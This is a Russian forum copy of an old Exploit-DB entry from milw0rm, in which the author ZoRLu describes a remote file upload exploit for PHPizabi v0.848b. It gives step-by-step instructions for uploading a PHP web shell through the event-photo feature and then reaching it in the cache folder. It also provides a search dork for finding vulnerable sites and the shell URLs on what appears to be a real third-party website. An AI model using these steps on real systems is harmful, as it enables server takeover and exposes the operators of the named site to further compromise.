- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5136
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-0805
- Дата публикации
- 2008-02-17
Код:
############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload
author: ZoRLu
home: www.yildirimordulari.org
contact: [email protected]
dork: "Powered by PHPizabi v0.848b C1 HFP1"
############################################
exploit:
http://localhost/izabi/system/cache/pictures/id_shell.php
-first register web site
-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )
-event title and description write. show to select All the users. gözat button click and shell.php upload
-after go to event page. upload photo right click. open the menu click to properties. copy the url
example:
http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
and
exploit:
http://localhost/izabi/system/cache/pictures/xxx_shell.php
example web site:
http://bitchinindie.com/system/image.php?file=597_shell.php&width=500
exploit shell.php
http://bitchinindie.com/system/cache/pictures/597_shell.php
##################################################
thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasýrga(lavrens), avkidis, head_hunter
and all users yildirimordulari.org
siircicocuk nerelerdesin be kanka msn e takýl özlettin kendini :)))
## yildirimordulari.org açýlýr mý açýlmaz mý orasý bilinmez ama bilinen birþey var o bir efsane ##
#################################################
# milw0rm.com [2008-02-17]
- Источник
- www.exploit-db.com